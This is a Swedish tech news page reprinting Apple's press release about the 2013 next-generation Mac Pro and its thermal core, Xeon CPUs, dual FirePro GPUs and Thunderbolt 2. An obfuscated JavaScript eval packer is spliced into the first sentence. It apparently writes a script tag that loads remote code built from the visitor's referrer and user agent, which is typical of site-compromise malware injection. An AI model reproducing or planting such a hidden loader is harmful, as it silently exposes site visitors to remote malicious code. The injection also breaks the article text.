Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Apple bjuder på en tjuvtitt in i den stationära proffsdatorns framtid

apple
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adyzf|var|u0026u|referrer|harhh||js|php’.split(’|’),0,{}))
bjöd idag på en tjuvtitt in i den stationära datorns framtid med en presentation av nästa generations Mac Pro. Mac Pro är designad kring en revolutionerande thermal core, har en helt ny stationär arkitektur och en design som har optimerats för prestanda rakt igenom.

Med den senaste generationens Xeon-processorer, dubbla grafikprocessorer i proffsklass, Thunderbolt 2, PCIe-baserad flashlagring och supersnabbt ECC-minne rymmer nya Mac Pro en otrolig massa kraft i ett slimmat hölje som bara är 25 cm högt.

”Med de senaste Xeon-processorerna, dubbla FirePro-grafikprocessorer, ECC-minne, PCIe-baserad flashlagring och Thunderbolt 2, allt uppbyggt kring en revolutionerande thermal core är nästa generations Mac Pro den mest radikala Mac-datorn någonsin”, säger Philip Schiller, Apples vice VD på Worldwide Marketing. ”Otroliga prestanda och utbyggnadsmöjligheter har packats in i en helt ny design som bara är en åttondel så stor och som dessutom kommer att monteras i USA.”

Den senaste generationens Mac Pro är uppbyggd kring en smart thermal core som gör att datorn kan dela hela sin värmekapacitet mellan alla processorerna på ett effektivt sätt. Resultatet är en proffsdator med banbrytande prestanda i ett hölje som bara är en åttondel så stort till volymen som den nuvarande Mac Pro-modellen. De senaste Intel Xeon E5-processorerna med upp till tolv kärnor ger dubbla flyttalsprestanda. Med två AMD FirePro-grafikprocessorer i proffsklass är helt nya Mac Pro upp till 2,5 gånger snabbare än den nuvarande modellen av Mac Pro och levererar upp till otroliga sju teraflop datorkraft.

Nya Mac Pro har PCIe-baserad flashlagring som är upp till tio gånger så snabb som en traditionell hårddisk. Den är också utrustad med det senaste fyrkanaliga ECC DDR3-minnet som körs i upp till 1 866 MHz och ger upp till 60 GB/s i minnesbandbredd.* Med så mycket kraft är det ingen match för nya Mac Pro att redigera 4K-video i full upplösning samtidigt som du till exempel renderar effekter i bakgrunden.

Nästa generations Mac Pro kan byggas ut mer än någon tidigare Mac. Med sex Thunderbolt 2-portar som levererar upp till 20 Gbit/s i bandbredd till varje extern enhet är Mac Pro perfekt för anslutning av externa lagringsenheter, PCI-utbyggnadsenheter, breakout boxes för ljud och video och de senaste externa bildskärmarna, till exempel 4K-skärmar. Var och en av de sex Thunderbolt 2-portarna har stöd för upp till sex seriekopplade enheter, vilket ger dig möjlighet att ansluta upp till 36 högpresterande externa enheter. Thunderbolt 2 är helt bakåtkompatibel med befintliga Thunderbolt-enheter och gör det enklare och snabbare än någonsin att överföra data mellan Mac-datorer.

Nästa generations Mac Pro blir tillgänglig senare i år. Läs mer på www.apple.com/mac-pro

*Uppgifterna om prestanda baseras på tekniska specifikationer uppmätta i juni 2013 hos Mac Pro-enheter som ännu inte var i produktion.